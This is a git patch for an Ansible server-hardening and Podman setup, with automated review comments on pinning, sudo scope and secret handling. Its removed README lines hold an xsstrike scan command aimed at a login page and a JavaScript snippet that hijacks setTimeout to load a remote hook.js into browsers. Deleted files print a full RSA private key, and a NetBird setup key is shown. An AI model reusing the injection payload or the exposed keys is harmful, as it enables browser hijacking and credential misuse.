From 7f760cf4a6889db62f2ea47009b8983a4eec4d54 Mon Sep 17 00:00:00 2001 From: staffadmin Date: Tue, 20 Jan 2026 20:29:05 +0100 Subject: [PATCH] [First commit with podman setup] --- README.md | 114 ++------------- Vagrantfile | 41 ++---- collections/requirements.yml | 3 +- .../config/traefik-dynamic-configuration.yml | 4 - files/swarm/tls/jingoh.private.crt | 22 --- files/swarm/tls/jingoh.private.key | 27 ---- group_vars/all.yml | 75 +++++----- hardening-linux.yml | 41 ++++-- hosts | 3 + podman.yml | 138 ++++++++++++++++++ roles/.gitignore | 10 +- roles/requirements.yml | 13 ++ screenshots/http---23.134.94.44-32132.jpeg | Bin 48911 -> 0 bytes templates/alerts.sh.j2 | 63 -------- templates/docker-compose.yml.j2 | 2 - 15 files changed, 262 insertions(+), 294 deletions(-) delete mode 100644 files/swarm/config/traefik-dynamic-configuration.yml delete mode 100644 files/swarm/tls/jingoh.private.crt delete mode 100644 files/swarm/tls/jingoh.private.key create mode 100644 podman.yml delete mode 100644 screenshots/http---23.134.94.44-32132.jpeg delete mode 100644 templates/alerts.sh.j2 delete mode 100644 templates/docker-compose.yml.j2 diff --git a/README.md b/README.md index 19c2558..df57862 100644 --- a/README.md +++ b/README.md 
@@ -1,25 +1,21 @@ # semaphore ``` - python3 xsstrike.py -u https://147.135.51.88/login -(function() { - const originalSetTimeout = window.setTimeout; - window.setTimeout = function(fn, delay) { - if (delay > 0) { - const wrapped = function() { - if (!window.xetLoaded) { - var s = document.createElement('script'); - s.src = 'https://xet.jingoh.fr/hook.js'; - document.head.appendChild(s); - window.xetLoaded = true; - } - return fn.apply(this, arguments); - }; - return originalSetTimeout(wrapped, delay); - } - return originalSetTimeout(fn, delay); - }; -})(); + +# hardening + +https://github.com/linux-system-roles/sudo => ansible-galaxy role install linux-system-roles.sudo +singleplatform-eng.users +dev-sec.os_hardening : +dev-sec.ssh_hardening : +geerlingguy.firewall : +jnv.unattended-upgrades + + +# apps stacks + +https://github.com/alvistack/ansible-role-podman => installation podman +https://github.com/linux-system-roles/podman => manager pod like Kubernetes / services ``` 
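Review bot: The new role list names `dev-sec.os_hardening` and `dev-sec.ssh_hardening`, but hardening-linux.yml in this same commit applies them as `devsec.hardening.os_hardening` and `devsec.hardening.ssh_hardening` from the `devsec.hardening` collection added to collections/requirements.yml, so the README points readers at names the playbooks do not use; match the collection names. `jnv.unattended-upgrades` is listed as part of the hardening set, yet it only appears commented out in roles/requirements.yml and is not in the `roles:` of hardening-linux.yml, so either add it there or mark it as planned. The entries ending in a bare ` :` (`dev-sec.os_hardening :`, `dev-sec.ssh_hardening :`, `geerlingguy.firewall :`) look like unfinished descriptions; add the text or drop the colon, and `manager pod like Kubernetes / services` reads better as `manages pods and services, Kubernetes-style`. The whole list sits inside the ``` fence opened under `# semaphore`, so it renders as a code block rather than as prose.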
@@ -40,83 +36,3 @@ Add - package - firewall - - -flux bootstrap gitea --owner=staffadmin --repository=cluster --private=false --personal=true --path=./clusters/test --hostname gitea.jingoh.fr --read-write-key=true - -GITEA_TOKEN=fdsfsd - -==> delete secret in flux-system - -┌─[stephane@staff] - [~] - [2024-08-28 01:05:37] -└─[130] <> flux bootstrap gitea --owner=staffadmin --repository=cluster --private=true --personal=true --path=clusters/test --hostname gitea.jingoh.fr --token-auth -► connecting to gitea.jingoh.fr -► cloning branch "main" from Git repository "https://gitea.jingoh.fr/staffadmin/cluster.git" -✔ cloned repository -► generating component manifests -✔ generated component manifests -✔ component manifests are up to date -► installing components in "flux-system" namespace -✔ installed components -✔ reconciled components -► determining if source secret "flux-system/flux-system" exists -► generating source secret -► applying source secret "flux-system/flux-system" -✔ reconciled source secret -► generating sync manifests -✔ generated sync manifests -✔ sync manifests are up to date -► applying sync manifests -✔ reconciled sync configuration -◎ waiting for GitRepository "flux-system/flux-system" to be reconciled -✗ gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': authorization failed' -◎ waiting for Kustomization "flux-system/flux-system" to be reconciled -✗ client rate limiter Wait returned an error: context deadline exceeded -► confirming components are healthy -✔ helm-controller: deployment ready -✔ kustomize-controller: deployment ready -✔ notification-controller: deployment ready -✔ source-controller: deployment ready -✔ all components are healthy -✗ bootstrap failed with 2 health check failure(s): [error while waiting for GitRepository to be ready: 'gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: 
unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': authorization failed'', error while waiting for Kustomization to be ready: 'client rate limiter Wait returned an error: context deadline exceeded - - - - - -┌─[stephane@staff] - [~] - [2024-08-28 01:13:04] -└─[1] <> flux bootstrap gitea --owner=staffadmin --repository=cluster --private=true --personal=true --path=clusters/test --hostname gitea.jingoh.fr --token-auth -► connecting to gitea.jingoh.fr -► cloning branch "main" from Git repository "https://gitea.jingoh.fr/staffadmin/cluster.git" -✔ cloned repository -► generating component manifests -✔ generated component manifests -✔ component manifests are up to date -► installing components in "flux-system" namespace -✔ installed components -✔ reconciled components -► determining if source secret "flux-system/flux-system" exists -► generating source secret -► applying source secret "flux-system/flux-system" -✔ reconciled source secret -► generating sync manifests -✔ generated sync manifests -✔ sync manifests are up to date -► applying sync manifests -✔ reconciled sync configuration -◎ waiting for GitRepository "flux-system/flux-system" to be reconciled -✗ gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': Get "https://gitea.jingoh.fr/staffadmin/cluster.git/info/refs?service=git-upload-pack": dial tcp: lookup gitea.jingoh.fr on 10.43.0.10:53: server misbehaving' -◎ waiting for Kustomization "flux-system/flux-system" to be reconciled -✗ client rate limiter Wait returned an error: context deadline exceeded -► confirming components are healthy -✔ helm-controller: deployment ready -✔ kustomize-controller: deployment ready -✔ notification-controller: deployment ready -✔ source-controller: deployment ready -✔ all components are healthy -✗ bootstrap failed with 2 health check failure(s): [error while waiting for GitRepository to be ready: 
'gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': Get "https://gitea.jingoh.fr/staffadmin/cluster.git/info/refs?service=git-upload-pack": dial tcp: lookup gitea.jingoh.fr on 10.43.0.10:53: server misbehaving'', error while waiting for Kustomization to be ready: 'client rate limiter Wait returned an error: context deadline exceeded'] - - - - -# docker run -d -p 127.0.0.1:8000:8080 -e DATA_ROOT=/DATA -v /DATA:/DATA -v /var/run/docker.sock:/var/run/docker.sock --name casaos casaos \ No newline at end of file diff --git a/Vagrantfile b/Vagrantfile index e6df6ff..b773b59 100644 --- a/Vagrantfile +++ b/Vagrantfile 
@@ -1,29 +1,16 @@ -# -*- mode: ruby -*- -# vi: set ft=ruby : - -NNODES=2 - -$script = <<-SCRIPT -echo "ssh-rsa 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" >> /home/vagrant/.ssh/authorized_keys -SCRIPT - -# All Vagrant configuration is done below. The "2" in Vagrant.configure -# configures the configuration version (we support older styles for -# backwards compatibility). Please don't change it unless you know what -# you're doing. Vagrant.configure("2") do |config| - (0..NNODES - 1).each do |i| - config.vm.define "k8s-ubuntu-#{i}" do |node| - #node.vm.box = "ubuntu/focal64" - node.vm.box = "ubuntu/jammy64" - node.vm.hostname = "k8s-ubuntu-#{i}" - config.vm.provider "virtualbox" do |v| - v.memory = 2048 - v.cpus = 2 - end - node.vm.network "private_network", ip: "192.168.25.11#{i}" - node.vm.provision "shell", inline: $script - node.vm.provision "shell", inline: "echo hello from node #{i}" - end + config.vm.box = "generic/ubuntu2204" + config.vm.network "private_network", type: "dhcp" + # config.vm.network :hostonly, "192.168.1.21" + config.vm.synced_folder ".", "/vagrant", disabled: true + config.vm.provider "qemu" do |qe| + qe.qemu_dir = "/usr/bin/" + qe.arch="x86_64" + qe.memory = "2048" + qe.smp = "4" + qe.machine = "q35" + qe.cpu = "max" + qe.net_device = "virtio-net-pci" end -end \ No newline at end of file +end + diff --git a/collections/requirements.yml b/collections/requirements.yml index adadbd9..3c2cab1 100644 --- a/collections/requirements.yml +++ b/collections/requirements.yml @@ -5,8 +5,9 @@ collections: # - name: ansible.utils # # - name: community.grafana - name: community.docker - #! bitwarden - name: bitwarden.secrets + - name: devsec.hardening + - name: fedora.linux_system_roles # - name: community.general # # - name: geerlingguy.redis # # - name: git+https://github.com/netways/ansible-collection-elasticstack.git 
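Review bot: `config.vm.box = "generic/ubuntu2204"` is pulled without a pinned version, so each `vagrant up` may fetch a different box image for the test VM; add `config.vm.box_version = "<pinned version>"` next to it so the environment the hardening play is tested against is reproducible. `qe.arch="x86_64"` is the only assignment in the provider block without spaces around `=`; `qe.arch = "x86_64"` matches its neighbours. The commented-out `# config.vm.network :hostonly, "192.168.1.21"` line is dead configuration and can be dropped.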
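Review bot: The two collections added here, `devsec.hardening` and `fedora.linux_system_roles`, carry no `version:` key, so `ansible-galaxy collection install` resolves to whatever is latest at install time and the hardening applied to hosts can change between runs; pin each entry, e.g. `- name: devsec.hardening` followed by `  version: "<pinned version>"`. The same applies to the role entries added to roles/requirements.yml in this commit (`singleplatform-eng.users`, `linux-system-roles.sudo`, `geerlingguy.firewall`, `linux-system-roles.selinux`, `alvistack.podman`, `linux-system-roles.podman`), which also lack `version:`.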
diff --git a/files/swarm/config/traefik-dynamic-configuration.yml b/files/swarm/config/traefik-dynamic-configuration.yml deleted file mode 100644 index 610cba6..0000000 --- a/files/swarm/config/traefik-dynamic-configuration.yml +++ /dev/null @@ -1,4 +0,0 @@ -tls: - certificates: - - certFile: /run/secrets/wildcard-jingoh-private.crt - keyFile: /run/secrets/wildcard-jingoh-private.key \ No newline at end of file diff --git a/files/swarm/tls/jingoh.private.crt b/files/swarm/tls/jingoh.private.crt deleted file mode 100644 index a46aab1..0000000 --- a/files/swarm/tls/jingoh.private.crt +++ /dev/null 
@@ -1,22 +0,0 @@ ------BEGIN CERTIFICATE----- -MIIDrzCCApegAwIBAgIUKJ9Qnulnmv91wS0XQXuFAAJTLOkwDQYJKoZIhvcNAQEL -BQAwcTELMAkGA1UEBhMCRlIxFzAVBgNVBAgMDklsZXMtZGUtZnJhbmNlMQ4wDAYD -VQQHDAVQYXJpczEPMA0GA1UECgwGamluZ29oMQ8wDQYDVQQLDAZqaW5nb2gxFzAV -BgNVBAMMDmppbmdvaC5wcml2YXRlMB4XDTI0MDQxNzE5MDIxMloXDTM0MDQxNTE5 -MDIxMlowcTELMAkGA1UEBhMCRlIxFzAVBgNVBAgMDklsZXMtZGUtZnJhbmNlMQ4w -DAYDVQQHDAVQYXJpczEPMA0GA1UECgwGamluZ29oMQ8wDQYDVQQLDAZqaW5nb2gx -FzAVBgNVBAMMDmppbmdvaC5wcml2YXRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A -MIIBCgKCAQEAuvwbT5XwP4wOhPLubWk7KBdt1+taFV/YNIkx+Ky9Nb+eceJ8iYXm -Xy9bRK0WTdTiwOLC60h3WigsMMPc8sI1FiW3jfHMU8Z2GqJTHFM6CP1LcN+LpKZZ -f8pZu3ONMhTcaPGvGYH+GAdi8Qk7rRskirZlImsA6lGDoteKKF/Xc4Y6IoIxIZ7X -SK7klO/qN0ZPHWiu9QAtNBc4vVZEz83aXEbKH7eCOtSz07cOIT6yrvUF11225Y0e -nn+DOLEcBBwI5KLco0udERz/Epn90eUWgbibP4QIaVQJypFC17RU3fXkiqZjb0Qy -B2WEYi8awyB6KgZfu1PvzuvHYuKugBeYVwIDAQABoz8wPTAJBgNVHRMEAjAAMBsG -A1UdEQQUMBKCECouamluZ29oLnByaXZhdGUwEwYDVR0lBAwwCgYIKwYBBQUHAwEw -DQYJKoZIhvcNAQELBQADggEBAJ2hJ5SW9TD9yLecxG++x/jl32oxYJ/EyDPXZNHw -fAb+9YmniThDEJTJ2RJTOIhZz6uqdjfP+37sFDu17SMvxauG78RIYSaTGnIaoiXt -v5Uh4apUR1DOOPoZoUX82ZQJEJ5LenO+EFHevYbzgcDW61T/oByPwK8FOtLqQMHe -SC09WsGyLQ/hls+4EgxQFyl7UN5T9NK6xrQrHwNbV0IgHcnGcTSkzRj4mt1nzsdh -Enq/Ztz9iefxqDvHPFRRtcqDv+Ozh7zSuxVfP3tb7+5Ak7j/0Txi5NAbo+F3opAD -8eeY2dTgxc9sV1esvB305zgl4SUkfLD+BDjOjn/NvWFj2i0= ------END CERTIFICATE----- \ No newline at end of file diff --git a/files/swarm/tls/jingoh.private.key b/files/swarm/tls/jingoh.private.key deleted file mode 100644 index bc9b8cd..0000000 --- a/files/swarm/tls/jingoh.private.key +++ /dev/null 
@@ -1,27 +0,0 @@ ------BEGIN RSA PRIVATE KEY----- -MIIEowIBAAKCAQEAuvwbT5XwP4wOhPLubWk7KBdt1+taFV/YNIkx+Ky9Nb+eceJ8 -iYXmXy9bRK0WTdTiwOLC60h3WigsMMPc8sI1FiW3jfHMU8Z2GqJTHFM6CP1LcN+L -pKZZf8pZu3ONMhTcaPGvGYH+GAdi8Qk7rRskirZlImsA6lGDoteKKF/Xc4Y6IoIx -IZ7XSK7klO/qN0ZPHWiu9QAtNBc4vVZEz83aXEbKH7eCOtSz07cOIT6yrvUF1122 -5Y0enn+DOLEcBBwI5KLco0udERz/Epn90eUWgbibP4QIaVQJypFC17RU3fXkiqZj -b0QyB2WEYi8awyB6KgZfu1PvzuvHYuKugBeYVwIDAQABAoIBACqQz4rLgDiHIpsD -TmGbzfqvcrLvgb9R5T74aGbKs/vzVhdozp7j23CZsDYvDN/E8aWlOWgkQ/9DG+Qy -Ai9FJJ6ZEXL/s1ry19nyT+cnzxNSzgSw7vIZaFBd+RViFadr9kzxj8HHxNclf1GN -n4cloajuIpG2OCwfSE8er/XG8535cc7aErTpuhj5EoqRtYy++VkiC0d3VSaCE/uW -J1ulfGnaZ3qiJfr6o+0xlTPYFcK5pkm+3uvTdSYZeLSSJPfnnaqx7G8yxoVZ1QaH -3Sey4Ax1Y8vGYtbJ2ZS7NlnBgbgSDPGimZMFfoGFThK4Y5AcqGIEByZvOSByXnQ6 -tHiB6OECgYEA3KJIThM+RtwAk17MoRvkdUl+iPj0k+Go7lJQycFgCeNfp2rylqYm -K1/Hzo0rSueVVRO3iL+clxt3bYHHNk62nJnp+nnkAaETTs9A8QRwGk418BKw9HyR -faSrmXkTgKlY+sWrwECP9SyLa80UPyWIyIeOqb/zvjfirRRaPRFQTrECgYEA2PUI -HYSqia+iOm4XEOtlUMHbNnLhW/aFhBingABt/CMO0cPTCCYdEzS+xDZzF7MROHzd -O6zJyLUtenTIwN3dcVTWCPCRxcAY4p6V/PjV0c/b0vteQ4WWFM/l6ubTAwX+uJih -SQREkqseMPLAqeEX84yZfqb/N3s2N2GuGIbP6YcCgYEAsztlz38UbU3VbeJqC0r0 -WU896pmLXgLIT+ow1OUxVncOQpu/vB/3C+9ACoxlqfDdQALHauB1nc9jQmNV6Mki -0a67A443ahdm7vOwhtqbEtOMP51/gO0c59t4xzEzZaassPMZphEMoRfxnr43f2DH -cFemzkEwCcuuafoJoGhLO9ECgYA2yAg4i9sT0QlBf7LLTuTSM2DKqs9EjUbBSAhj -Rbh/xcpkJPIQSK9mvha9LJJ7FXfvr3edLc/1oenN1dcq+9qCV02EDFqCeDLQZgKx -UZOL2tRCvb3bhsuSjbwcSBRX2xeqPL/c0/sMnbCN433KZ0/I62OGm1wuAip6aWuw -PboZ2QKBgFaEqOCUFMGHet0A/BOGkzkpCZsXl+EDqvx9l7s30vdv2NIoNR8V+Zl3 -B2arO/jGjDZnbGJcHG6B7WrCX8aJyM7Fm9akbreL7lWWzqKXs1lDHwAxqQN/TllI -tO5XRx7AHoJXkEmzKAwQWAbKzRKLTp0x9lcOBGz8CR29oPxZI2/H ------END RSA PRIVATE KEY----- \ No newline at end of file diff --git a/group_vars/all.yml b/group_vars/all.yml index a23c8d2..c040cff 100644 --- a/group_vars/all.yml +++ b/group_vars/all.yml 
@@ -1,38 +1,54 @@ #* USERS +users: + - username: bot + name: bot user + # groups: ['wheel','systemd-journal'] + # uid: 1000 + home: /home/bot + # profile: | + # alias ll='ls -lah' + ssh_key: + - "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK7/ReeTsubS/KwTRaR/5k/6d5CEef0XTXvyRwfVBjwW" + - username: dbtest + name: dbtest user + # groups: ['wheel','systemd-journal'] + # uid: 1000 -management_user_list: - - name: stephane - shell: '/bin/bash' - authorized_keys: - - key: "ssh-rsa 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 stephane" - exclusive: yes - sudo: - hosts: ALL - as: ALL - commands: ALL - nopasswd: ALL - - -#* GO - -golang_gopath: /usr/local/go -# golang_download_dir: /home/stephane/.ansible/tmp/downloads +sudo_sudoers_files: + - path: /etc/sudoers.d/bot + user_specifications: + - users: + - bot + hosts: + - ALL + operators: + - ALL + commands: + - "NOPASSWD: ALL" #* PACKAGES package_repo: - python3-pip - #! argocd control plane - - sshpass + - podman + - lsof +# - libsemanage + +# package_pip: +# - python3-libsemanage + #* FIREWALL firewall_allowed_tcp_ports: - "22" + - "2222" - "80" + - "8080" - "443" - "9100" + - "32222" # #! Kubernetes control plane ports # - "6443" # - "2379" @@ -43,23 +59,4 @@ firewall_allowed_tcp_ports: # - "9090" # - "3000" # - "9323" -#! Kubernetes Worker ports - - - -#* NETBIRD - -netbird_setup_key: 33BE5022-D0CF-4ED9-84FF-B93E53519FDD -netbird_register: true - -#* TLS - -node_exporter_tls_server_config: - cert_file: /etc/node_exporter/tls.cert - key_file: /etc/node_exporter/tls.key - -#* NODE_EXPORTER - -# node_exporter_basic_auth_users: -# randomuser: examplepassword -node_exporter_web_listen_address: "{{ host_private_address }}:9100" +#! Kubernetes Worker ports \ No newline at end of file diff --git a/hardening-linux.yml b/hardening-linux.yml index d155ad4..9aa43bf 100644 --- a/hardening-linux.yml +++ b/hardening-linux.yml 
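Review bot: The new `sudo_sudoers_files` entry grants the `bot` account `NOPASSWD: ALL` on `ALL` hosts as `ALL` operators, while `users` installs a single ed25519 key for it; if this account exists to run the podman play as `run_as_user: bot`, consider narrowing `commands:` to what that needs rather than `"NOPASSWD: ALL"`, since the key in `ssh_key` then becomes an unrestricted root credential. The ports added to `firewall_allowed_tcp_ports` (`"2222"`, `"8080"`, `"32222"`) carry no comment saying which service listens on them, unlike the Kubernetes ports commented out below; a one-line comment per port would make a later audit of this list easier. The `dbtest` user is added with only `username` and `name` (no `ssh_key`, no `home`), so it is not clear from this file how that account is meant to be used.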
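Review bot: `node_exporter_tls_server_config` and `node_exporter_web_listen_address` are removed here, but `firewall_allowed_tcp_ports` in the first hunk of this file still lists `"9100"`; if node_exporter is no longer deployed, drop the port as well, otherwise the firewall opens a port nothing is expected to listen on. The removed `netbird_setup_key` value stays in the repository history after this commit; treat it as exposed and rotate it on the NetBird side if that has not already been done.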
@@ -1,11 +1,34 @@ -- hosts: all +- hosts: localtest + #! Need first setup with root access user become: true - roles: - # #! need change for iphone ssh access - # - name: devsec.hardening.ssh_hardening - # #! be carefull - # - name: devsec.hardening.os_hardening + pre_tasks: + - ansible.builtin.apt: + update_cache: yes -# - community.general.ufw: -# state: enabled -# policy: allow \ No newline at end of file + - ansible.builtin.apt: + name: "*" + state: latest + + - ansible.builtin.apt: + upgrade: safe + + - ansible.builtin.apt: + clean: yes + + - ansible.builtin.apt: + name: "{{ item }}" + state: latest + loop: "{{ package_repo }}" + when: package_repo is defined + + - ansible.builtin.pip: + name: "{{ item }}" + loop: "{{ package_pip }}" + when: package_pip is defined + + roles: + - name: singleplatform-eng.users + - name: linux-system-roles.sudo + - name: devsec.hardening.ssh_hardening + - name: devsec.hardening.os_hardening + - name: geerlingguy.firewall \ No newline at end of file diff --git a/hosts b/hosts index 2ab34f7..da6c469 100644 --- a/hosts +++ b/hosts @@ -4,6 +4,9 @@ scaleway ansible_host=163.172.84.28 ansible_user=stephane [tower] scaleway ansible_host=163.172.84.28 ansible_user=stephane +; [localtest] +; #! test ansible_host=ubuntu.orb.local ansible_user=ansible ansible_ssh_private_key_file=~/.orbstack/ssh/id_ed25519 #! First setup +; test ansible_host=ubuntu.orb.local ansible_user=bot ansible_ssh_private_key_file=~/.orbstack/ssh/id_ed25519 ; [local] ; localhost ansible_host=127.0.0.1 ansible_user=stephanegratias ; [cluster] diff --git a/podman.yml b/podman.yml new file mode 100644 index 0000000..5b6b393 --- /dev/null +++ b/podman.yml 
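Review bot: The `ansible.builtin.pip` task uses `loop: "{{ package_pip }}"` with `when: package_pip is defined`, but Ansible expands the `loop` expression before evaluating `when`, so an undefined `package_pip` (it is commented out in group_vars/all.yml in this commit) fails the task with an undefined-variable error instead of skipping it; use `loop: "{{ package_pip | default([]) }}"`, and the same for the `package_repo` loop. The `ansible.builtin.apt` task with `name: "*"` and `state: latest` already upgrades every installed package, so the following `upgrade: safe` task repeats that work; keep one of the two. None of the pre_tasks carry a `name:`, which makes the play output hard to follow; e.g. `- name: Upgrade all installed packages`.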
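Review bot: Both plays added in this commit target `hosts: localtest`, but the `[localtest]` group and its two host lines are added here commented out with `;`, so the inventory has no host in that group and the plays match nothing; uncomment `[localtest]` together with the line for the account that should currently be used, or state in a comment that the group is intentionally left disabled. The two commented host lines differ only in `ansible_user` (`ansible` for the first setup, `bot` afterwards), which the `#! First setup` marker hints at; a short comment stating that the second line replaces the first once the `bot` account exists would make the switch explicit.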
@@ -0,0 +1,138 @@ +- hosts: localtest + become: true + vars: + #! SECRETS + # vaultwarden_url: "{{ lookup('env', 'vaultwarden_url') }}" + # bw_client_secret: "{{ lookup('env', 'bw_client_secret') }}" + # bw_client_password: "{{ lookup('env', 'bw_client_password') }}" + # bw_client_id: "{{ lookup('env', 'bw_client_id') }}" + # user_mail: "{{ lookup('env', 'mail') }}" + # user: "{{ lookup('env', 'username') }}" + # # Token full access gitea + # bw_requested_password_id: "{{ lookup('env', 'bw_requested_password_id') }}" + #! PODS + # podman_registries_conf: + # aliases: + # myregistry: quay.io + # podman_registry_username: test + # podman_registry_password: test + podman_create_host_directories: true + # podman_firewall: + # - port: 8080-8081/tcp + # state: enabled + # - port: 12340/tcp + # state: enabled + # podman_selinux_ports: + # - ports: 8080-8081 + # setype: http_port_t + podman_kube_specs: + - state: started + run_as_user: bot + run_as_group: bot + kube_file_content: + apiVersion: v1 + kind: Pod + metadata: + name: db + spec: + containers: + - name: db + image: docker.io/mysql:9 + ports: + - containerPort: 1234 + hostPort: 12340 + volumeMounts: + - mountPath: /var/lib/db:Z + name: db + volumes: + - name: db + hostPath: + path: /var/lib/db + # podman_secrets: + # - name: mysql-root-password-container + # state: present + # skip_existing: true + # data: "{{ root_password_from_vault }}" + # - name: mysql-root-password-kube + # state: present + # skip_existing: true + # data: | + # apiVersion: v1 + # data: + # password: "{{ root_password_from_vault | b64encode }}" + # kind: Secret + # metadata: + # name: mysql-root-password-kube + # - name: envoy-certificates + # state: present + # skip_existing: true + # data: | + # apiVersion: v1 + # data: + # certificate.key: {{ key_from_vault | b64encode }} + # certificate.pem: {{ cert_from_vault | b64encode }} + # kind: Secret + # metadata: + # name: envoy-certificates + # - state: started + # run_as_user: webapp + # 
run_as_group: webapp + # kube_file_src: /path/to/webapp.yml + +#! SECRETS + pre_tasks: + - name: Install Bitwarden CLI + ansible.builtin.command: + cmd: "{{ item }}" + delegate_to: localhost + loop: + - apk add --no-cache nodejs npm + - npm install -g @bitwarden/cli + + - ansible.builtin.command: + cmd: bw logout + delegate_to: localhost + ignore_errors: true + + - name: bitwarden token session + ansible.builtin.shell: "{{ item }}" + environment: + BW_CLIENTID: "{{ bw_client_id }}" + BW_CLIENTSECRET: "{{ bw_client_secret }}" + BW_PASSWORD: "{{ bw_client_password }}" + loop: + - bw config server {{ vaultwarden_url }} + - bw login --apikey + - bw unlock --passwordenv BW_PASSWORD --raw + delegate_to: localhost + register: bw_session_result + + - name: Get secret from Bitwarden + command: + argv: + - bw + - get + - password + - "{{ bw_requested_password_id }}" + - --session + - "{{ bw_session_result.results[-1].stdout | trim }}" + delegate_to: localhost + register: gitea_token_result + no_log: true + changed_when: false + + # - name: Return all secrets from a path + # ansible.builtin.debug: + # msg: "{{ gitea_token_result.stdout }}" + # delegate_to: localhost + + - ansible.builtin.set_fact: + gitea_token : "{{ gitea_token_result.stdout | trim }}" + no_log: true + delegate_to: localhost + +#! ROLES + roles: + #! By default, the files will be copied to or created in /etc/containers/systemd/$name.$type for root containers + #! and $HOME/.config/containers/systemd/$name.$type for rootless containers, on the managed node. + - name: linux-system-roles.podman \ No newline at end of file diff --git a/roles/.gitignore b/roles/.gitignore index 2b44480..8bec64d 100644 --- a/roles/.gitignore +++ b/roles/.gitignore 
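Review bot: The `bitwarden token session` task registers the output of `bw unlock --passwordenv BW_PASSWORD --raw` in `bw_session_result` without `no_log: true`, so the raw session key is printed in the task result and retained by any logging callback; add `no_log: true` to that task as the `Get secret from Bitwarden` task already does. The `vaultwarden_url` and `bw_client_*` variables those pre_tasks read are commented out under `vars:` at the top of this play, so unless they are supplied elsewhere the first `bw config server` call fails on an undefined variable. That `bw config server {{ vaultwarden_url }}` line goes through `ansible.builtin.shell` unquoted; `ansible.builtin.command` with `argv`, as used for the `bw get` call, avoids shell interpretation of the value. `gitea_token` is set at the end of the pre_tasks but nothing in this file reads it, and the `podman_secrets` block that would consume a vault value is commented out.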
@@ -47,4 +47,12 @@ cloudalchemy.grafana CTL-Fed-Security.ansible-grafana thomasjpfan.docker-swarm asg1612.dockerswarm -gantsign.golang \ No newline at end of file +gantsign.golang +singleplatform-eng.users +linux-system-roles.sudo +devsec.hardening.os_hardening +devsec.hardening.ssh_hardening +geerlingguy.firewall +alvistack.podman +linux-system-roles.podman +linux-system-roles.selinux \ No newline at end of file diff --git a/roles/requirements.yml b/roles/requirements.yml index b62fd7f..aba7997 100644 --- a/roles/requirements.yml +++ b/roles/requirements.yml @@ -13,6 +13,19 @@ # - src: geerlingguy.kubernetes # PIP - src: geerlingguy.pip +#! USER +- src: singleplatform-eng.users +- src: linux-system-roles.sudo +#! HARDENING => collection +# - src: devsec.hardening.os_hardening +# - src: devsec.hardening.ssh_hardening +- src: geerlingguy.firewall +- src: linux-system-roles.selinux +#! PODS +- src: alvistack.podman +- src: linux-system-roles.podman +# - src: fedora.linux_system_roles.firewall +# jnv.unattended-upgrades # - src: asg1612.dockerswarm # SYSTEM # - src: tumf.systemd-service 
diff --git a/screenshots/http---23.134.94.44-32132.jpeg b/screenshots/http---23.134.94.44-32132.jpeg deleted file mode 100644 index 97b9a60057dbded52f8abde9953366ccf1a0bf50..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 48911 zcmeFZ3sh6dx-J^E)o!)5X-3+$~BGE(a1Ux|1O{YLq`3(?DB_9h>wlejki%kef8@{63ffa5vqlOsCEPaOM9U+0T2^mX*~3{QS@ z%FxKnSWoXut1r#WEzVe;F*tSZ{JGQTzd3#8^dE)nJAC-?k&lmPA336Z+ECB%^#9|q z_X?o(@qwzte?73z6tG`w-vOc=(h3e{RcFcqxHG=SMXmRz7gx_>U{zH&IjR}U(g3TY-)Qw?#=@{ z`yX&M&py^SbNC(~|KsCwFzUunwa>>Vz6M>s+tkwhO;|$NlBRH@eVPFHpX&aj@Iwa= zYZ4u`G!5IgfB&J6KRUGkz`wO^pOz-|E8yqf!LG+WKB%pu`vd$zUrp2alAbBZ?#}Wd z+sn9#yf0SbWe)BQ8~^clt0#&6F>(OiFIM1tOexG`c~U6B{m`*pIE zOxpT<;B-xtvW6KsoM9B~P*H|v6+ja(*^yJEk(mg>*S+P*eu}suDtyau7^4W!;~OF9)q0g><3HkR-0Q#U*#c5~CfArdCjTQ*sQ2!^^Hdww zIqwZ?{`UV!)Cv62_@_vJ?K#eF#C#IVZ26DlaTlD49VNZ4yht* z`ru~=0f*kI-Cub0bkCPKKs(Q{VEyOB4-%*PfCwE41nRJraUyhXY|f_h!}JMLWo^am zTRigcfgftpyN4)InM{ect{Au(S8O2NW@Iqp33LW?@Xj+eNc>w=FI`H(i1X0=b)?6v ztcfOWF3JrZ?4wfLDWHZ9G|}MUb)86 zdZ9b_e01Es%OEJcYPrENyF9_Tq;hvicB*=?b8Zi?L>xMndiI4w{{BqPI5Mf2c_uTH zGGiWD9iRL@ezCNjFll{whcc~6^f_vu#Z4dDC)@W7)M2&0R z0|a_*wA@^%!mcFzwrK>#M??+Jk6sM0j;s%uK8>-v{?L1)Qh8XFaJ99@Irfh}t> zF&^g-?o9K%AS91)IAczxxP14;Fgs#OhD|K|d}=((Ab^xfXTcj|U_f`HO7gl;i+H$+Ag-J|#dL~z zbY@){p%X4^9=5C-c_@y!$$A@2CdW&n&d8Fzzn+j5VqxJ!I$*w_k1jdc zsq914(+S>kgjO*A6#H60bRyo21DVqHj+1z5y3K%vhPwC&^`u6+cX2W@U1(^zTX+gW(8l9~&I@q&Mjd!V zshgLA0NMV~vwrJXH|V?Fzs-~4=O}HY21ELCC8m+pOd7Y>(z(CjV8#f zKEb-fS)Z;p$-=^b$8qzRoE#Fh7Wd)agqOW2yOLT1Mv>QA#X2kP7G@t01rn;#-E5>e zhR-%r+)=EgU4zn(r8=JbO`RfA)!47XFAS*fv%=*4Q3i$~X-|(#m={x)=ji>d+h7Ec zSJ3Wo+4YCl!>Y?S&kRZbE{V0jRs=RX8)5&{pX$@6BeZvS-UB#{uC&`QR=H_0SiisR zbANfx`K&_^bTklz8?!eKALg{iMov#ptA5$#+)JJ*O>rn9qnvxFXo98RR;P=+QBrjo115~*goSRB+b$arMM8h#XPs!DP-$c-vK!@HX&D! 
